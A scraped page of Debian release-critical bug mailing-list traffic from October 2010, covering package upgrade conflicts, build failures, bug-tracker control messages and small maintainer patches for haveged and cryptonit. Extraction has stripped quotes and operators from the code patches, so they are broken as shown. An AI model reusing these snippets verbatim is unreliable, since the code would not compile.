 bogofilter-sqlite - a fast Bayesian spam filter (sqlite)
 bogofilter-tokyocabinet - a fast Bayesian spam filter (tokyocabinet)
Closes: 600489
Changes: 
 bogofilter (1.2.2-2) unstable; urgency=high
 .
   * Add debian/bogofilter-{bdb,sqlite,tokyocabinet}.preinst to remove
 /usr/share/doc/bogofilter-{bdb,sqlite,tokyocabinet} if they exist and are
 symlinks, which was the case back in 1.1.7-2. Setting urgency=high.
 closes: #600489.
   * 

Bug#600765: fails to upgrade: file conflict with openjdk-6-jdk (javaws.1.gz)

2010-10-19 Thread Michael Biebl
Package: openjdk-6-jre
Version: 6b18-1.8.2-2
Severity: serious

The package fails to upgrade:

Vorbereiten zum Ersetzen von openjdk-6-jre 6b18-1.8.2-1 (durch 
.../openjdk-6-jre_6b18-1.8.2-2_i386.deb) ...
Entpacke Ersatz für openjdk-6-jre ...
dpkg: Fehler beim Bearbeiten von 
/var/cache/apt/archives/openjdk-6-jre_6b18-1.8.2-2_i386.deb (--unpack):
 Versuche, »/usr/lib/jvm/java-6-openjdk/man/man1/javaws.1.gz« zu überschreiben, 
welches auch in Paket openjdk-6-jdk 6b18-1.8.2-1 ist
configured to not write apport reports
  Vorbereiten zum Ersetzen von 
openjdk-6-jdk 6b18-1.8.2-1 (durch .../openjdk-6-jdk_6b18-1.8.2-2_i386.deb) ...
Entpacke Ersatz für openjdk-6-jdk ...
Verarbeite Trigger für man-db ...
Verarbeite Trigger für menu ...
Verarbeite Trigger für gnome-menus ...
Verarbeite Trigger für desktop-file-utils ...
Verarbeite Trigger für hicolor-icon-theme ...
Fehler traten auf beim Bearbeiten von:
 /var/cache/apt/archives/openjdk-6-jre_6b18-1.8.2-2_i386.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
pluto:~# LANG=C apt-get -f install



-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (200, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.utf8, LC_CTYPE=de_DE.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages openjdk-6-jre depends on:
ii  libaccess-bridge-java-j 1.26.2-5 Java Access Bridge for GNOME (jni 
ii  libasound2  1.0.23-2 shared library for ALSA applicatio
ii  libc6   2.11.2-6 Embedded GNU C Library: Shared lib
ii  libgif4 4.1.6-9  library for GIF images (library)
ii  libjpeg62   6b1-1The Independent JPEG Group's JPEG 
ii  libpng12-0  1.2.44-1 PNG library - runtime
ii  libpulse0   0.9.21-3 PulseAudio client libraries
ii  libx11-62:1.3.3-3X11 client-side library
ii  libxext62:1.1.2-1X11 miscellaneous extension librar
ii  libxi6  2:1.3-4  X11 Input extension library
ii  libxrender1 1:0.9.6-1X Rendering Extension client libra
ii  libxtst62:1.1.0-3X11 Testing -- Record extension li
ii  openjdk-6-jre-headless  6b18-1.8.2-2 OpenJDK Java runtime, using Hotspo
ii  zlib1g  1:1.2.3.4.dfsg-3 compression library - runtime

Versions of packages openjdk-6-jre recommends:
ii  ttf-dejavu-extra  2.31-1 Vera font family derivate with add

Versions of packages openjdk-6-jre suggests:
pn  icedtea6-plugin   none (no description available)

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#591118: [monkeysphere] Bug#591118: monkeysphere: FTBFS: test failed

2010-10-19 Thread intrigeri
Jameson Rollins wrote (19 Oct 2010 13:46:09 GMT) :
 but maybe we can find some other ways to reduce entropy consumption

I don't know if this would be considered good-practice, or even
allowed by the Debian policy, but build-depending on haveged would
probably fix the test suite entropy problems.

bye,
-- 
  intrigeri intrig...@boum.org
  | GnuPG key @ https://gaffer.ptitcanardnoir.org/intrigeri/intrigeri.asc
  | OTR fingerprint @ 
https://gaffer.ptitcanardnoir.org/intrigeri/otr-fingerprint.asc
  | If you must label the absolute, use it's proper name: Temporary.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#594379: haveged: FTBFS: Architecture mismatch on rd. Requires v9|v9a|v9b; requested architecture is sparclite.

2010-10-19 Thread Sven Hartge
On 17.10.2010 00:20, intrigeri wrote:
 Sven Hartge wrote (13 Sep 2010 23:21:35 GMT) :
 Steve Kostecke said:
 Jakub Wilk said:
 
 haveged failed to build from source on sparc[0]:
 
 haveged only supports x86 and amd64.
 
 This is not completely true. The code should still support SPARC (and
 ia64 and ppc), but the Debian SPARC port has a 32bit (aka sparclite)
 userland (with a 64bit kernel) and haveged wants to use an assembler
 instruction only available in v9 aka 64bit mode:
 
 Some bits of 0.9-3 fix a pretty annoying bug (#565755), so I'd
 really like a fixed package to go into Squeeze.
 
 OTOH, even if breaking it for Sparc while fixing it for three other
 architectures could seem reasonable, we may be able to do better... if
 people with Sparc knowledge speak up.

I revived my SunFire v240, installed an up-to-date Sid on it and tried
to reproduce this bug. But I am no longer able to get the mentioned
error with the current gcc-4.4 from Sid.

haveged compiles, links and runs in both 32bit and 64bit (-m64) mode.
A quick check with the included crypto tests also shows no apparent
error in the resulting binaries.

I believe this bug will vanish if the dependency on gcc-4.3 is removed.
On i386/amd64 haveged will have to get compiled using -O0, because of
the segfault still occurring on these archs.

Grüße,
Sven.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#591118: [monkeysphere] Bug#591118: monkeysphere: FTBFS: test failed

2010-10-19 Thread Daniel Kahn Gillmor
On 10/19/2010 05:26 PM, intrigeri wrote:
 Jameson Rollins wrote (19 Oct 2010 13:46:09 GMT) :
 but maybe we can find some other ways to reduce entropy consumption
 
 I don't know if this would be considered good-practice, or even
 allowed by the Debian policy, but build-depending on haveged would
 probably fix the test suite entropy problems.

fwiw, the test suite shouldn't be bleeding the system of entropy anyway;
i thought i'd enabled --quick-random for gpg in the tests, and the
openssh/openssl business should be reading from /dev/urandom anyway.

i'll look further into the tests when i have a chance to see if i can
find where it's reading from /dev/random.

thanks to everyone for the attention to this.

Regards,

--dkg



signature.asc
Description: OpenPGP digital signature


Processed: severity of 588095 is important

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 588095 important
Bug #588095 [libcore-ocaml-doc] libcore-ocaml-doc: core-api modules 
documentation is empty
Severity set to 'important' from 'grave'

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
588095: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=588095
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#594379: haveged: FTBFS: Architecture mismatch on rd. Requires v9|v9a|v9b; requested architecture is sparclite.

2010-10-19 Thread Jérémy Bobbio
On Tue, Oct 19, 2010 at 11:27:09PM +0200, Sven Hartge wrote:
 I revived my SunFire v240, installed an up-to-date Sid on it and tried
 to reproduce this bug. But I am no longer able to get the mentioned
 error with the current gcc-4.4 from Sid.
 
 haveged compiles, links and runs in both 32bit and 64bit (-m64) mode.
 A quick check with the included crypto tests also shows no apparent
 error in the resulting binaries.
 
 I believe this bug will vanish if the dependency on gcc-4.3 is removed.
 On i386/amd64 haveged will have to get compiled using -O0, because of
 the segfault still occurring on these archs.

For another option, I have found in polarssl assembly code to retrieve
the hardclock on older Sparc architectures.  With the attached patch
applied, haveged did build and test fine on smetana.d.o.

Cheers,
-- 
Jérémy Bobbio.''`. 
lu...@debian.org: :Ⓐ  :  # apt-get install anarchism
`. `'` 
  `-   
--- haveged-0.9.orig/src/havegedef.h
+++ haveged-0.9/src/havegedef.h
@@ -57,8 +57,13 @@
 #endif

 #ifdef HAVE_ISA_SPARC
-#define ARCH sparc
-#define HARDCLOCK(x) ASM(rd %%tick, %0:=r(x):r(x))
+# define ARCH sparc
+# if defined(__GNUC__)  defined(__sparc__)
+#  define HARDCLOCK(x) ASM(.byte 0x83, 0x41, 0x00, 0x00);\
+   ASM(mov   %%g1, %0 : =r(x))
+# else
+#  define HARDCLOCK(x) ASM(rd %%tick, %0:=r(x):r(x))
+# endif
 #endif

 #ifdef HAVE_ISA_PPC


signature.asc
Description: Digital signature


Processed (with 1 errors): pcmanfm: rebuilding works for me

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 600387 grave
Bug #600387 [pcmanfm] pcmanfm: symbol lookup error: pcmanfm: undefined symbol: 
fm_path_new
Severity set to 'grave' from 'normal'

 merge 600391 600387
Bug#600387: pcmanfm: symbol lookup error: pcmanfm: undefined symbol: fm_path_new
Bug#600391: pcmanfm: symbol lookup error: pcmanfm: undefined symbol: fm_path_new
Mismatch - only Bugs in same state can be merged:
Values for `severity' don't match:
 #600387 has `grave';
 #600391 has `important'

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600391: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600391
600387: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600387
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: libfm0: ABI breakage without package and SONAME change

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 reassign 600387 libfm 0.1.14-1
Bug #600387 [pcmanfm] pcmanfm: symbol lookup error: pcmanfm: undefined symbol: 
fm_path_new
Bug reassigned from package 'pcmanfm' to 'libfm'.
Bug No longer marked as found in versions pcmanfm/0.9.7-1.
Bug #600387 [libfm] pcmanfm: symbol lookup error: pcmanfm: undefined symbol: 
fm_path_new
There is no source info for the package 'libfm' at version '0.1.14-1' with 
architecture ''
Unable to make a source version for version '0.1.14-1'
Bug Marked as found in versions 0.1.14-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600387: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600387
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: found 599953 in 3.301-1, found 599963 in 3.301-1

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 found 599953 3.301-1
Bug #599953 [src:libverilog-perl] libverilog-perl: FTBFS on mipsel: test 
failures
Bug Marked as found in versions libverilog-perl/3.301-1.
 found 599963 3.301-1
Bug #599963 [src:libverilog-perl] libverilog-perl: FTBFS on mips: Terminated 
after t/34_parser.t
Bug Marked as found in versions libverilog-perl/3.301-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
599963: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=599963
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600767: gnome-system-monitor: Insanely high cpu/dbus usage

2010-10-19 Thread Josselin Mouette
severity 600767 important
tag 600767 unreproducible
thanks

Le mardi 19 octobre 2010 à 15:11 -0700, Ben Wong a écrit : 
 Gnome-system-monitor has always been a CPU pig, especially when
 drawing graphs, however this is a new bug.
 
 Now, even when it is not actively redrawing anything (for example,
 displaying the System tab), it uses up 100% CPU continuously.
 Apparently it is making excessive dbus calls. Half of the CPU goes to
 gnome-system-monitor and half to dbus-daemon.  I have attached a log
 from dbus-monitor.

Sorry but I can’t reproduce this here. If you can find a way to
reproduce this reliably, please don’t hesitate to send it.

The logs indicate that it is communicating with g-d-u, which may
indicate something in your mounts that makes g-s-m go mad.

Cheers,
-- 
 .''`.  Josselin Mouette
: :' :
`. `'  “If you behave this way because you are blackmailed by someone,
  `-[…] I will see what I can do for you.”  -- Jörg Schilling


signature.asc
Description: This is a digitally signed message part


Processed: Re: Bug#600767: gnome-system-monitor: Insanely high cpu/dbus usage

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 600767 important
Bug #600767 [gnome-system-monitor] gnome-system-monitor: Insanely high cpu/dbus 
usage
Severity set to 'important' from 'grave'

 tag 600767 unreproducible
Bug #600767 [gnome-system-monitor] gnome-system-monitor: Insanely high cpu/dbus 
usage
Added tag(s) unreproducible.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600767: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600767
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600423: marked as done (linux-2.6: too many open files)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 23:14:31 +
with message-id e1p8lo3-0005uu...@franck.debian.org
and subject line Bug#600423: fixed in linux-2.6 2.6.32-26
has caused the Debian Bug report #600423,
regarding linux-2.6: too many open files
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
600423: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600423
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: linux-2.6
Severity: serious

We will hit a build failure soon as the total number of patch
applications and removals approaches 1024.

Ben.

 Forwarded Message 
From: Thorsten Glaser t...@mirbsd.de
To: Ben Hutchings b...@decadent.org.uk
Cc: Bastian Blank wa...@mirbsd.org
Subject: linux-2.6: too many open files
Date: Wed, 13 Oct 2010 19:13:24 + (UTC)

Hi,

I'm trying to build the sid kernel plus smarenka’s patches which you
reverted and ran into “too many open files”:

patches.py has
 try:
 fp = file(os.path.join(home, 'series', i))
 ret.append(PatchSeries(i, home, fp))
 except IOError:
 pass

In IPython, I get:

In [41]: fp
Out[41]: open file 
'/home/tg/linux-2.6-2.6.32/debian/patches/series/24+m68k.1', mode 'r' at 
0x8e005a0
In [42]: PatchSeries(i, home, fp)
---
IOError   Traceback (most recent call last)
/home/tg/linux-2.6-2.6.32/ipython console in module()
/home/tg/linux-2.6-2.6.32/debian/lib/python/debian_linux/patches.pyc in 
__init__(self, name, root, fp)
IOError: [Errno 24] Too many open files: 
'/home/tg/linux-2.6-2.6.32/debian/patches/bugfix/m68k/fp/0030-Update-for-m68k-Add-support-for-EARLY_PRINTK-on-MVM.patch'

I found out that ulimit -n defaulting to 1024 is too small to handle
this because that code insists on keeping all file pointers open.
Just so you know…

bye,
//mirabilos
-- 
I believe no one can invent an algorithm. One just happens to hit upon it
when God enlightens him. Or only God invents algorithms, we merely copy them.
If you don't believe in God, just consider God as Nature if you won't deny
existence.  -- Coywolf Qi Hunt





signature.asc
Description: This is a digitally signed message part
---End Message---
---BeginMessage---
Source: linux-2.6
Source-Version: 2.6.32-26

We believe that the bug you reported is fixed in the latest version of
linux-2.6, which is due to be installed in the Debian FTP archive:

firmware-linux-free_2.6.32-26_all.deb
  to main/l/linux-2.6/firmware-linux-free_2.6.32-26_all.deb
linux-2.6_2.6.32-26.diff.gz
  to main/l/linux-2.6/linux-2.6_2.6.32-26.diff.gz
linux-2.6_2.6.32-26.dsc
  to main/l/linux-2.6/linux-2.6_2.6.32-26.dsc
linux-base_2.6.32-26_all.deb
  to main/l/linux-2.6/linux-base_2.6.32-26_all.deb
linux-doc-2.6.32_2.6.32-26_all.deb
  to main/l/linux-2.6/linux-doc-2.6.32_2.6.32-26_all.deb
linux-headers-2.6.32-5-486_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-486_2.6.32-26_i386.deb
linux-headers-2.6.32-5-686-bigmem_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-686-bigmem_2.6.32-26_i386.deb
linux-headers-2.6.32-5-686_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-686_2.6.32-26_i386.deb
linux-headers-2.6.32-5-all-i386_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-all-i386_2.6.32-26_i386.deb
linux-headers-2.6.32-5-all_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-all_2.6.32-26_i386.deb
linux-headers-2.6.32-5-amd64_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-amd64_2.6.32-26_i386.deb
linux-headers-2.6.32-5-common-openvz_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-common-openvz_2.6.32-26_i386.deb
linux-headers-2.6.32-5-common-vserver_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-common-vserver_2.6.32-26_i386.deb
linux-headers-2.6.32-5-common-xen_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-common-xen_2.6.32-26_i386.deb
linux-headers-2.6.32-5-common_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-common_2.6.32-26_i386.deb
linux-headers-2.6.32-5-openvz-686_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-openvz-686_2.6.32-26_i386.deb
linux-headers-2.6.32-5-vserver-686-bigmem_2.6.32-26_i386.deb
  to 
main/l/linux-2.6/linux-headers-2.6.32-5-vserver-686-bigmem_2.6.32-26_i386.deb
linux-headers-2.6.32-5-vserver-686_2.6.32-26_i386.deb
  to main/l/linux-2.6/linux-headers-2.6.32-5-vserver-686_2.6.32-26_i386.deb

Bug#597375: bsc: canceling move-operation removes source folder

2010-10-19 Thread Christoph Haas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Am 19.10.2010 13:15, schrieb Julien Cristau:
 On Mon, Sep 20, 2010 at 23:07:26 +0200, Christoph Haas wrote:
 
 I understand that this behavior was not what you expected. And I'm on
 your side that the Break button should actually do something instead
 of just waiting for the operation to finish halfway and lose everything
 that should have been moved after pressing it. I'll forward your
 complaint to the upstream developer to have it fixed.

 Not sure I'd agree on the grave severity but I'll leave it at that and
 see what the developer will do.

 Any news?

Not yet unfortunately. I'll ping the upstream developer again. If he
fails to respond I'll consider having bsc removed from Debian.

…Christoph
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAky+KTgACgkQCV53xXnMZYaSHwCfXcymgKGeJnMgwklYvTbbQAVk
WdkAoLEYVHQ8r/MBchrrSTHuIvnPynUU
=3e8S
-END PGP SIGNATURE-



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#589194: openclipart: diff for NMU version 0.18+dfsg-9.1

2010-10-19 Thread Tim Retout
tags 589194 - pending
thanks

Hi Miguel,

I suspect that your upload for bug #589194 has been rejected for the
same reason as #582998 - it is possible for non-DDs to make NMUs, but
they must be uploaded by a sponsor.

I'm going to convert your patch to a QA upload and test it - if it
builds I will sponsor it under your name.  Let me know if you've got any
other patches waiting.

Regards,

-- 
Tim Retout dioc...@debian.org


signature.asc
Description: This is a digitally signed message part


Processed: Re: Bug#589194: openclipart: diff for NMU version 0.18+dfsg-9.1

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 589194 - pending
Bug #589194 [src:openclipart] openclipart: FTBFS: Enters infinite loop
Removed tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
589194: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=589194
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#593465: found where function was added upstream

2010-10-19 Thread Micah Anderson

I looked at the SM upstream source for their SM-1_4-STABLE branch, and
found that they added this function Mon Jul 27, 2009, as evidenced here:

http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/imap_general.php?r1=13733r2=13789

Considering that the version of SM that is in Lenny was uploaded in
December of 2008, the sqimap_run_literal_command would not have been
there thus would need to be added for the security update.

It looks like the update that Thijs prepared[0] added that function. Why
it doesn't work is what needs to be determined.

micah


0. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=593465#10

-- 



pgpj67JsVUpmS.pgp
Description: PGP signature


Bug#595446: ntop: diff for NMU version 3:3.3-14.1

2010-10-19 Thread Jordan Metzmeier
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Alexander,

I would like to request that this time be extended. I have contacted Ola
today to request removal from squeeze. The concern is not this RC bug,
but the ability to offer security support for a beta release from from
2007 for the lifetime of squeeze. In this case, I feel that it will be
best to offer this package via backports only, as soon as I can have a
4.x package prepared and uploaded to experimental.

Regards,
- -- 
Jordan Metzmeier
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBCAAGBQJMvjTDAAoJEKj/C3qNthmT5f4P/0DF3sBesJucXpTZl3zHykD9
AL46n317G435kaSwzsPqi08GItvJfxpcha7nXmSI3ImlATZfEezkVTlRkrrJdCOP
/RvPgs8d6XCx4HBTtcOpWPUBugM6uRbgunoSSPwfoSmvzAzKxBR2t6DZ94sDEkOW
iuLcfPy9Y++x7YiicjJMmIJgSKETeZ7jM8BYzribjaa5d3DA2xOKz8nC+BphbtFP
j+I+2ms5pcpJW7Vm+Qv/tQhJObXCF0DpzepWiX0DAvnrYNz1IOXJGxV8Kw2BT+l3
qrEgfc4gmDOeXs1Qx806itCpI5GaVenjxhsgH0MDD8El/hlCEkHsWSAwg+Y3w60w
GG/uHbnjA088SLlFVpnCNq16uhCYNgppD5lKViVesYslpR3ebileEG8xHtTTwTjz
RAv9FPwfiD7gY3L2zfYDyqmnrvmcIgBY1L1vzHDBl+o5DMsMU91VI7kr++c5ynCq
GegvK4ImOJ4ilmRzia2HFG4GHRCkh/kabYv7YJueljV05eCvO79rwFb3ztG/mC8z
6YKCwUeYkcPdhkdSb0q82dU1PGTk+6ckbVGb/oXIH5KMHUg8IrxWou0jVM5uvwoF
n5EdzkifUehEliVRGQpBe5McVT4tru32jc5+TrtxZgkSSVjEEDHS3bO+ftdzt2O3
Kjjr0pQHC242au2f25Dq
=Lnke
-END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#530024: [Pkg-utopia-maintainers] Bug#530024: network-manager: suggested patch

2010-10-19 Thread Michael Biebl
On 03.10.2010 22:49, Raphael Hertzog wrote:
 tags 530024 + patch
 thanks
 
 Hi, 
 
 please find attached a patch based on what Ubuntu has done with a few
 improvements:
 - a single backup per run but the correct one
 - disable with a special prefix (to allow the next feature)
 - re-enable on removal
 
 It's still somewhat crude, i.e. it's not something I would like to have on
 my own package but it works for now. You might also want to tweak the name
 of the backup files and maybe remove them on purge...

Hi Raphael,

thanks for the patch. A few comments:

a/ running the script will comment out the line
iface ethX inet dhcp, but not auto ethX itself. Is that intentional? I'd say
commenting out all lines relating to ethX would be more logical

b/ I'd change the comment marker to something like
#Disabled by NetworkManager# or #Managed by NetworkManager#

c/ I'm not sure if we should restore /etc/network/interfaces from the backup
file, as this file might have become out-of-sync with /etc/network/interface and
we overwrite changes that were made in between. The question is, if we even need
to create a backup file.
My suggestion would be, to simply remove the comment markers (inplace) for
/etc/network/interface on remove. This would ensure we preserve any local
modifications.
What do you think?


Other than that, it seems to do it's job just fine.

Thanks again,
Michael


-- 
Why is it that all of the instruments seeking intelligent life in the
universe are pointed away from Earth?



signature.asc
Description: OpenPGP digital signature


Bug#586838: marked as done (mgltools-geomutils: depends on python ( 2.6))

2010-10-19 Thread Debian Bug Tracking System
Your message dated Wed, 20 Oct 2010 01:58:19 +0100
with message-id 1287536299.19267.5.ca...@arneb.retout.co.uk
and subject line Re: mgltools-geomutils: depends on python ( 2.6)
has caused the Debian Bug report #586838,
regarding mgltools-geomutils: depends on python ( 2.6)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
586838: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=586838
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---

Package: mgltools-bhtree
Version: 1.5.4.cvs.20090603-1
Severity: serious
User: debian-pyt...@lists.debian.org
Usertag: python2.6

Hello,

Most of the mgltools-* packages depend on python ( 2.6) and are 
therefore currently uninstallable in sid.


--
Jakub Wilk


signature.asc
Description: Digital signature
---End Message---
---BeginMessage---
Version: 1.5.4.cvs.20090603-1+b1

Mmm, this is similar to #586849.  Let's see if the BTS understands
binNMU versions when closing bugs. :)  There aren't any other RC bugs on
mgltools-geomutils, so it would be nice not to move a new upstream
version to squeeze, I think.

-- 
Tim Retout dioc...@debian.org


signature.asc
Description: This is a digitally signed message part
---End Message---


Bug#410130: cryptonit: diff for NMU version 0.9.7-2.4

2010-10-19 Thread diocles
tags 410130 + pending
thanks

Dear maintainer,

I've prepared an NMU for cryptonit (versioned as 0.9.7-2.4) containing
the patch from Stefano Rivera, and uploaded it to DELAYED/2 as
suggested by section 5.11.1 of the Developer's Reference.  Please feel
free to tell me if I should delay it longer.

I've omitted from this debdiff the updates to config.sub and
config.guess that was made automatically in the clean rule.

Regards,

diff -u cryptonit-0.9.7/debian/changelog cryptonit-0.9.7/debian/changelog
--- cryptonit-0.9.7/debian/changelog
+++ cryptonit-0.9.7/debian/changelog
@@ -1,3 +1,11 @@
+cryptonit (0.9.7-2.4) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * src/ConfigDatabase.cpp: Apply patch from Stefano Rivera to fix
+GUI start on amd64. (Closes: #410130)
+
+ -- Tim Retout dioc...@debian.org  Wed, 20 Oct 2010 01:15:10 +0100
+
 cryptonit (0.9.7-2.3) unstable; urgency=low
 
   * Non-maintainer upload.
only in patch2:
unchanged:
--- cryptonit-0.9.7.orig/src/ConfigDatabase.cpp
+++ cryptonit-0.9.7/src/ConfigDatabase.cpp
@@ -270,7 +270,7 @@
 
 // Strip the config:// part if presents.
 std::string params( uri );
-unsigned int i = params.find(config://);
+std::string::size_type i = params.find(config://);
 if( i != std::string::npos)
params.erase(i, strlen(config://) );
 



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: cryptonit: diff for NMU version 0.9.7-2.4

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 410130 + pending
Bug #410130 [cryptonit] cryptonit does not start
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
410130: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=410130
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org




Bug#589194: QA upload for openclipart

2010-10-19 Thread Tim Retout
Hi Rene,

I'm building this package - looks like it'll take a while; I can delay
uploading if you want a chance to respond yourself.  Although that's a
strange way of orphaning packages in my opinion. ;)

Regards,

-- 
Tim Retout dioc...@debian.org


signature.asc
Description: This is a digitally signed message part


Bug#593465: tried the fix too

2010-10-19 Thread Micah Anderson

I tried the fixed package too, and I got the same error as reported by
Jan Kontze. I'm running courier imapd from Lenny, and perdition. 

I looked at the fix some more on the SM websvn, and I think I found a
missing hunk that was applied at the same time the security fix was, but
is *not* in the debian package:

216a218,221
   {
   $response = 'OK';
   break 2;
   }

I just applied that on top of Thijs' fixed package, and then attempted
to login with a user with an 8-bit character in their password, and it
worked. I think that if this hunk was added along with the missing
function that was included in Thijs' package, it should solve the
regression. 

micah


-- 



pgpg0CzoEAdBc.pgp
Description: PGP signature


Bug#600782: pyca is NOT compatible with the default python version 2.6

2010-10-19 Thread REN Xiaolei
Package: pyca
Version: 20031119-0
Severity: serious

Maintainer should modify the hash-bang line in python scripts from 
`#!/usr/bin/python' to `#!/usr/bin/python2.5'
because some DeprecationWarning appeared and said md5, sha, mimify modules 
should be replaced.

-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.35.4-x86_64-linode16 (SMP w/4 CPU cores)
Locale: LANG=zh_CN.UTF-8, LC_CTYPE=zh_CN.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages pyca depends on:
ii  adduser   3.112  add and remove users and groups
ii  logrotate 3.7.8-6Log rotation utility
ii  openssl   0.9.8o-2   Secure Socket Layer (SSL) binary a
ii  python2.6.6-3interactive high-level object-orie

Versions of packages pyca recommends:
ii  nginx [httpd-cgi] 0.7.67-3   small, but very powerful and effic
ii  postfix [mail-transport-agent 2.7.1-1High-performance mail transport ag
pn  python-ldap   none (no description available)
pn  slapd none (no description available)

pyca suggests no packages.

